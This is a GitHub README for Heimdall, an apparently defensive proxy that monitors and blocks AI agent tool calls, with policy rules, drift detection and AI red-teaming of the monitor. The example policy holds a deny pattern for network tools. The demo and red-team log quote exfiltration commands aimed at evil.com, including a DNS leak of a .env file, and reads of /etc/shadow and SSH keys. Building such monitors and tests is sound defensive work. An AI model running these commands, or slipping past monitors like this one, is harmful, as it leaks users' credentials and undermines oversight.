GitHub - mchahed99/heimdall: Easily monitor/audit what agents do (security, compliance, drift) — Anthropic Claude Code Hackathon 2026

Runtime governance for AI agent tool calls.

An open-source, MCP-native proxy that enforces security policies on every tool call, transforms dangerous arguments before they reach the server, and produces a tamper-evident cryptographic audit trail -- with supply-chain drift detection built in.

Capability	What Heimdall does
Policy enforcement	YAML rules decide PASS, HALT, or RESHAPE per tool call
Controlled mutation	RESHAPE rewrites arguments (e.g. redact secrets) -- both original and transformed are logged
Signed audit trail	SHA-256 hash chain + Ed25519 signatures on every decision
Drift detection	Baselines `tools/list` and alerts when server definitions change
AI-powered policy	Opus 4.6 generates, red-teams, and auto-patches your policy
Real-time dashboard	WebSocket-fed UI showing decisions, risk tiers, and drift alerts

Why Heimdall

Other projects address parts of the MCP security problem. Heimdall combines all five layers compared below:

	Tool allowlists	Policy enforcement	Deterministic RESHAPE	Signed audit chain	AI policy generation
Heimdall	✓	✓ YAML rules (PASS/HALT/RESHAPE)	✓ both versions logged	✓ SHA-256 + Ed25519	✓ Opus 4.6 pipeline
Tool allowlists	✓	✗	✗	✗	✗
MCP proxies	✓	partial	✗	✗	✗

In one sentence: Heimdall is a policy enforcement proxy with deterministic argument transformation, a cryptographic audit trail, supply-chain drift detection, and AI-generated policies -- not just a tool allowlist or quarantine layer.

Quickstart (2 minutes)

git clone https://github.com/mchahed99/heimdall && cd heimdall
bun install

Using Claude Code?

bun run heimdall init            # creates bifrost.yaml + .heimdall/
bun run heimdall hook install    # installs pre/post tool-use hooks -- done

Using any MCP agent?

bun run heimdall init
bun run heimdall guard --target "npx -y @modelcontextprotocol/server-filesystem ."

Want AI to write your security policy?

export ANTHROPIC_API_KEY=sk-ant-...
bun run heimdall audit --path .

One command. Generates a policy from your codebase, red-teams it with 4 parallel agents, and auto-patches gaps.

Run the demo

Watch Heimdall stop a supply-chain attack in real time:

bun run demo:run

Open http://localhost:3000?token=demo-token to watch the dashboard live. The demo server auto-scaffolds a project at /tmp/demo-project.

What happens:

Baseline OK -- agent calls list_files, read_file -- both PASS, chain builds
Drift detected -- server silently adds send_report tool -- Heimdall flags it
Endpoint blocked -- agent calls send_report to https://evil.com/exfil -- HALT
Secret redacted -- send_report data contains sk-ant-... -- RESHAPE to [REDACTED]
Chain verified -- bun run heimdall runecheck -- VALID, Ed25519 signed

Tamper test -- prove the chain is tamper-evident:

bun run demo:tamper          # corrupt rune #3
bun run heimdall runecheck   # → INVALID, chain broken at rune #3

Change one byte. Proof breaks.

How it works

┌──────────┐    ┌─────────────────────┐    ┌──────────┐
│ AI Agent │───▶│      HEIMDALL       │───▶│  Tools   │
│          │◀───│                     │◀───│          │
└──────────┘    │  ┌───────────────┐  │    └──────────┘
                │  │   Runechain   │  │
                │  │ ■ → ■ → ■ → ■ │  │──▶ Dashboard
                │  └───────────────┘  │
                └─────────────────────┘

Every tool call goes through Heimdall. For each one:

Check -- YAML policy decides PASS, HALT, or RESHAPE
Record -- decision inscribed as a Rune with full context
Chain -- each Rune is SHA-256 hash-chained and Ed25519 signed
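
The Record and Chain steps can be illustrated with a minimal hash-chain sketch. The `Rune` shape, the `inscribe` helper, and the choice to hash a JSON array of fields are assumptions made for illustration, not Heimdall's actual schema or serialization; signing is left out here.

```typescript
import { createHash } from "node:crypto";

// Hypothetical Rune shape for illustration; Heimdall's real type may differ.
interface Rune {
  sequence: number;
  tool: string;
  decision: "PASS" | "HALT" | "RESHAPE";
  previousHash: string; // "GENESIS" for the first rune
  hash: string;
}

// Hash the rune's fields together with the previous rune's hash.
function hashRune(sequence: number, tool: string, decision: string, previousHash: string): string {
  return createHash("sha256")
    .update(JSON.stringify([sequence, tool, decision, previousHash]))
    .digest("hex");
}

// Append a rune whose hash commits to everything recorded before it.
function inscribe(chain: Rune[], tool: string, decision: Rune["decision"]): Rune[] {
  const last = chain[chain.length - 1];
  const previousHash = last ? last.hash : "GENESIS";
  const sequence = chain.length + 1;
  const hash = hashRune(sequence, tool, decision, previousHash);
  return [...chain, { sequence, tool, decision, previousHash, hash }];
}

let chain: Rune[] = [];
chain = inscribe(chain, "list_files", "PASS");
chain = inscribe(chain, "read_file", "PASS");
chain = inscribe(chain, "send_report", "HALT");

for (const rune of chain) {
  console.log(rune.sequence, rune.tool, rune.decision, rune.hash.slice(0, 8));
}
```

Because each hash covers the previous hash, changing any earlier rune changes every hash after it.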

Write policies in YAML

version: "1"
realm: "my-project"

drift:
  action: WARN   # WARN | HALT | LOG
  message: "Server tools changed since last verified"

wards:
  - id: block-exfiltration
    tool: "Bash"
    when:
      argument_matches:
        command: "(?i)(curl|wget|nc|ssh)\\s"
    action: HALT
    message: "Network command blocked"
    severity: critical

  - id: redact-secrets
    tool: "*"
    when:
      argument_contains_pattern: "(sk-[a-zA-Z0-9]{20,}|ghp_[a-zA-Z0-9]{36})"
    action: RESHAPE
    message: "Secrets redacted from arguments"
    severity: critical
    reshape:
      data: "[REDACTED]"

  - id: safe-rm
    tool: "Bash"
    when:
      argument_matches:
        command: "rm\\s+-rf"
    action: RESHAPE
    message: "rm -rf converted to dry-run"
    severity: high
    reshape:
      command: "echo '[blocked] rm -rf' && ls -la"

  - id: rate-limit
    tool: "*"
    when:
      max_calls_per_minute: 30
    action: HALT
    message: "Rate limit exceeded"
    severity: high

Three actions: HALT blocks the call, RESHAPE transforms its arguments into something safe, PASS allows it. When multiple rules match, the most restrictive action wins.
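
A rough sketch of how "most restrictive wins" could be resolved. The `Ward` shape, the `decide` function, the ordering HALT > RESHAPE > PASS, and the default of PASS when no ward matches are all assumptions for illustration; only `argument_matches` is modeled, and the sketch uses JavaScript's `i` flag in place of the inline `(?i)` prefix.

```typescript
type Action = "PASS" | "RESHAPE" | "HALT";

// Hypothetical, trimmed-down ward shape; not Heimdall's real type.
interface Ward {
  id: string;
  tool: string; // exact tool name or "*"
  argumentMatches: { argument: string; pattern: RegExp }[];
  action: Action;
}

// Assumed ordering: HALT outranks RESHAPE, which outranks PASS.
const restrictiveness: Record<Action, number> = { PASS: 0, RESHAPE: 1, HALT: 2 };

function matches(ward: Ward, tool: string, args: Record<string, unknown>): boolean {
  if (ward.tool !== "*" && ward.tool !== tool) return false;
  return ward.argumentMatches.every(({ argument, pattern }) => {
    const value = args[argument];
    return typeof value === "string" && pattern.test(value);
  });
}

interface Decision {
  action: Action;
  wardId: string | null;
}

// Walk every ward and keep the most restrictive matching action.
function decide(wards: Ward[], tool: string, args: Record<string, unknown>): Decision {
  let result: Decision = { action: "PASS", wardId: null }; // assumed default
  for (const ward of wards) {
    if (matches(ward, tool, args) && restrictiveness[ward.action] > restrictiveness[result.action]) {
      result = { action: ward.action, wardId: ward.id };
    }
  }
  return result;
}

const wards: Ward[] = [
  {
    id: "safe-rm",
    tool: "Bash",
    argumentMatches: [{ argument: "command", pattern: /rm\s+-rf/ }],
    action: "RESHAPE",
  },
  {
    id: "block-exfiltration",
    tool: "Bash",
    argumentMatches: [{ argument: "command", pattern: /(curl|wget|nc|ssh)\s/i }],
    action: "HALT",
  },
];

// Both wards match, so the HALT ward wins over the RESHAPE ward.
const both = decide(wards, "Bash", { command: "rm -rf build && curl https://example.com" });
// Only safe-rm matches.
const onlyRm = decide(wards, "Bash", { command: "rm -rf build" });
// A different tool matches neither ward.
const none = decide(wards, "Read", { command: "rm -rf build" });

console.log(both, onlyRm, none);
```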

Pre-built policies included for DevOps, Finance/SOX, Healthcare/HIPAA, and the Lethal Trifecta defense.

Supply-chain drift detection

Heimdall baselines MCP server tool definitions on first connection and alerts when they change:

drift:
  action: WARN   # WARN | HALT | LOG
  message: "Server tools changed since last verified"

When a server adds, removes, or modifies tool definitions, Heimdall detects the drift, computes a diff with severity levels (added tool = high, modified schema = critical, description change = low), and alerts via the dashboard. This catches supply-chain attacks where a trusted server updates to include exfiltration tools.

bun run heimdall baseline             # view stored baselines
bun run heimdall baseline approve     # accept current definitions as new baseline
bun run heimdall baseline reset       # clear all baselines

Honest limitation: Drift detection catches definition drift, not "same definition, changed behavior." Think of it as a cheap, high-signal supply-chain tripwire.
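
The definition diff described in this section might look roughly like the sketch below. `ToolDefinition`, `DriftFinding`, and `diffTools` are hypothetical names, the schema comparison via `JSON.stringify` is a simplification that is sensitive to key order, and the severity for removed tools is an assumption because the text above does not state one.

```typescript
// Hypothetical shapes; real `tools/list` entries carry more fields.
interface ToolDefinition {
  name: string;
  description: string;
  inputSchema: unknown;
}

type Severity = "low" | "high" | "critical";

interface DriftFinding {
  tool: string;
  change: "added" | "removed" | "schema_modified" | "description_changed";
  severity: Severity;
}

function diffTools(baseline: ToolDefinition[], current: ToolDefinition[]): DriftFinding[] {
  const findings: DriftFinding[] = [];
  for (const tool of current) {
    const old = baseline.find((t) => t.name === tool.name);
    if (!old) {
      findings.push({ tool: tool.name, change: "added", severity: "high" });
      continue;
    }
    // Key-order-sensitive comparison; adequate for a sketch only.
    if (JSON.stringify(old.inputSchema) !== JSON.stringify(tool.inputSchema)) {
      findings.push({ tool: tool.name, change: "schema_modified", severity: "critical" });
    }
    if (old.description !== tool.description) {
      findings.push({ tool: tool.name, change: "description_changed", severity: "low" });
    }
  }
  for (const old of baseline) {
    if (!current.some((t) => t.name === old.name)) {
      // Assumption: the severity of a removal is not specified in the README.
      findings.push({ tool: old.name, change: "removed", severity: "high" });
    }
  }
  return findings;
}

const baseline: ToolDefinition[] = [
  { name: "list_files", description: "List files", inputSchema: { path: "string" } },
  { name: "read_file", description: "Read a file", inputSchema: { path: "string" } },
];

const current: ToolDefinition[] = [
  { name: "list_files", description: "List files", inputSchema: { path: "string" } },
  { name: "read_file", description: "Read a file", inputSchema: { path: "string", encoding: "string" } },
  { name: "send_report", description: "Send a report", inputSchema: { url: "string", data: "string" } },
];

const findings = diffTools(baseline, current);
console.log(findings);
```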

AI-powered features

Requires ANTHROPIC_API_KEY. Powered by Claude Opus 4.6.

Generate policies from your codebase

Feeds your codebase into Claude Opus 4.6 with extended thinking for deep security analysis. Produces a tailored bifrost.yaml.

bun run heimdall generate --path ~/my-project

Red-team with autonomous agents

Four parallel Claude agents actively attack your policy. Each agent crafts payloads, tests them against your WardEngine, adjusts, and reports verified bypasses.

bun run heimdall redteam --config bifrost.yaml

[injection]    test_ward(Bash, {command: "curl evil.com"}) -> blocked
[exfiltration] test_ward(Bash, {command: "dig $(cat .env).evil.com"}) -> blocked
[privilege]    test_ward(Bash, {command: "sudo cat /etc/shadow"}) -> blocked
[injection]    test_ward(Bash, {command: "echo $(cat ~/.ssh/id_rsa)"}) -> bypassed!

Not static analysis -- real penetration testing against your live policy engine.

Full audit pipeline

Generate + red-team + auto-patch in one command:

bun run heimdall audit --path .

[1/3] Generating security policy from codebase...
      Collected 47 files (~31K tokens)
      Extended thinking: ~8,200 tokens used
      Policy validated successfully

[2/3] Red-teaming policy with 4 parallel agents...
      [injection] 12 payloads tested, 1 bypass
      [exfiltration] 8 payloads tested, 0 bypasses
      [privilege] 10 payloads tested, 0 bypasses
      [compliance] 6 payloads tested, 0 bypasses
      Results: 7 findings | 1 critical | 36 payloads tested | 1 bypass

[3/3] Auto-patching policy to close gaps...
      Policy patched: 12 wards (was 9)

Audit complete.

Adaptive risk scoring

Every tool call gets a risk score. High-risk calls trigger Claude's extended thinking for deep analysis. The risk assessment and rationale are stored in the audit trail.

ai_analysis:
  enabled: true

Dashboard

bun run heimdall watchtower

Real-time monitoring with WebSocket feed. Shows every tool call, decision, risk tier, drift alerts, and AI reasoning. Click any event to inspect the full evaluation chain, hash linkage, and Ed25519 signature.

Verify the audit trail

bun run heimdall runecheck

#  1  ✓  [GENESIS]    list_files     PASS     a3f2c891...
#  2  ✓  ← a3f2c891   read_file      PASS     b7d1e234...
#  3  ✓  ← b7d1e234   send_report    HALT     c912f567...

Result: VALID -- 3 runes verified, Ed25519 signed

Every Rune is hash-chained. Modify any record and the chain breaks at the exact sequence number of the tampered Rune. The trail is tamper-evident -- if anyone edits a rune, deletes an entry, or reorders the chain, runecheck detects it. Ed25519 signatures prevent forgery without the private key.
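
To make the verification idea concrete, here is a minimal sketch of checking a signed hash chain with Node's built-in `node:crypto` module. The `SignedRune` layout, the helper names, and the decision to sign each hash are assumptions for illustration; they are not taken from Heimdall's runecheck implementation.

```typescript
import { createHash, generateKeyPairSync, sign, verify } from "node:crypto";

// Hypothetical record layout, not Heimdall's actual Rune schema.
interface SignedRune {
  sequence: number;
  payload: string; // serialized decision context
  previousHash: string; // "GENESIS" for the first record
  hash: string; // SHA-256 over sequence, payload, previousHash
  signature: string; // Ed25519 signature over `hash`, base64
}

const { publicKey, privateKey } = generateKeyPairSync("ed25519");

function digest(sequence: number, payload: string, previousHash: string): string {
  return createHash("sha256")
    .update(JSON.stringify([sequence, payload, previousHash]))
    .digest("hex");
}

function append(chain: SignedRune[], payload: string): void {
  const last = chain[chain.length - 1];
  const previousHash = last ? last.hash : "GENESIS";
  const sequence = chain.length + 1;
  const hash = digest(sequence, payload, previousHash);
  // Ed25519 takes no separate digest algorithm, hence `null`.
  const signature = sign(null, Buffer.from(hash), privateKey).toString("base64");
  chain.push({ sequence, payload, previousHash, hash, signature });
}

// Returns the position of the first invalid rune, or null if the chain verifies.
function firstBrokenRune(chain: SignedRune[]): number | null {
  let expectedPrevious = "GENESIS";
  let expectedSequence = 1;
  for (const rune of chain) {
    const linked = rune.previousHash === expectedPrevious && rune.sequence === expectedSequence;
    const intact = rune.hash === digest(rune.sequence, rune.payload, rune.previousHash);
    const signed = verify(null, Buffer.from(rune.hash), publicKey, Buffer.from(rune.signature, "base64"));
    if (!linked || !intact || !signed) return expectedSequence;
    expectedPrevious = rune.hash;
    expectedSequence += 1;
  }
  return null;
}

const chain: SignedRune[] = [];
append(chain, "list_files PASS");
append(chain, "read_file PASS");
append(chain, "send_report HALT");

const untouched = firstBrokenRune(chain);

// Edit the third record's payload without re-hashing or re-signing it.
const edited = chain.map((rune) =>
  rune.sequence === 3 ? { ...rune, payload: "send_report PASS" } : rune,
);
const afterEdit = firstBrokenRune(edited);

// Delete the second record; the third no longer links to its predecessor.
const afterDelete = firstBrokenRune(chain.filter((rune) => rune.sequence !== 2));

console.log({ untouched, afterEdit, afterDelete });
```

The hash check catches edits, the linkage check catches deletions and reordering, and the signature check means an attacker who recomputes hashes still cannot produce valid records without the private key.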

RESHAPE security model

RESHAPE is controlled mutation, not AI-generated rewrites:

Deterministic rules only -- RESHAPE applies a static YAML merge, not AI-generated mutations
Both versions logged -- every Rune records the original arguments hash AND the reshaped result
Strict scope -- can only modify argument values, not add tool calls or change the tool name
__DELETE__ sentinel -- the only way to remove a key (explicit, auditable)
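
A static merge with a `__DELETE__` sentinel could be sketched as follows. The `reshape` function here is hypothetical: it assumes flat arguments and a shallow merge, lets a rule set a key that was absent from the original, and hashes the original arguments as JSON. None of these details are confirmed by the README.

```typescript
import { createHash } from "node:crypto";

const DELETE = "__DELETE__";

type Args = Record<string, unknown>;

interface ReshapeOutcome {
  originalHash: string; // SHA-256 of the original arguments, kept for the audit record
  reshaped: Args;
}

// Shallow, deterministic merge: same inputs always produce the same output.
function reshape(original: Args, rules: Args): ReshapeOutcome {
  const reshaped: Args = { ...original };
  for (const key of Object.keys(rules)) {
    if (rules[key] === DELETE) {
      delete reshaped[key]; // explicit removal via the sentinel
    } else {
      reshaped[key] = rules[key]; // overwrite with the static value from the rule
    }
  }
  const originalHash = createHash("sha256").update(JSON.stringify(original)).digest("hex");
  return { originalHash, reshaped };
}

const originalArgs: Args = { url: "https://example.com/report", data: "key=sk-ant-...", debug: true };
const outcome = reshape(originalArgs, { data: "[REDACTED]", debug: DELETE });

console.log(outcome.reshaped);
console.log(outcome.originalHash);
```

The original object is copied rather than mutated, so both versions remain available for logging.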

All commands

Command	What it does
`heimdall init`	Create policy + audit directory
`heimdall guard --target <cmd>`	Start MCP proxy
`heimdall hook install`	Install Claude Code hooks
`heimdall validate`	Check your policy
`heimdall doctor`	Health check
`heimdall audit --path .`	Generate + red-team + auto-patch
`heimdall generate`	AI policy generation
`heimdall redteam`	AI red-team swarm
`heimdall watchtower`	Live dashboard
`heimdall runecheck`	Verify audit chain
`heimdall baseline`	View/approve/reset tool baselines
`heimdall log`	Query audit trail
`heimdall export --format json`	Export for compliance

Architecture

Bun monorepo written in strict-mode TypeScript:

Package	Role
`@heimdall/core`	Types, WardEngine, Runechain, DriftDetector, YAML loader
`@heimdall/proxy`	MCP intercept proxy (Bifrost)
`@heimdall/hooks`	Claude Code PreToolUse/PostToolUse hooks
`@heimdall/cli`	Commander.js CLI
`@heimdall/dashboard`	React 19 + Vite + Tailwind v4 (Watchtower)
`@heimdall/ai`	Opus 4.6 policy generation, red-teaming, risk scoring
`@heimdall/demo-server`	Demo MCP server with drift simulation

Contributing

bun install && bun test   # 197 tests, <700ms

MIT License

Every call inspected. Every decision proven.

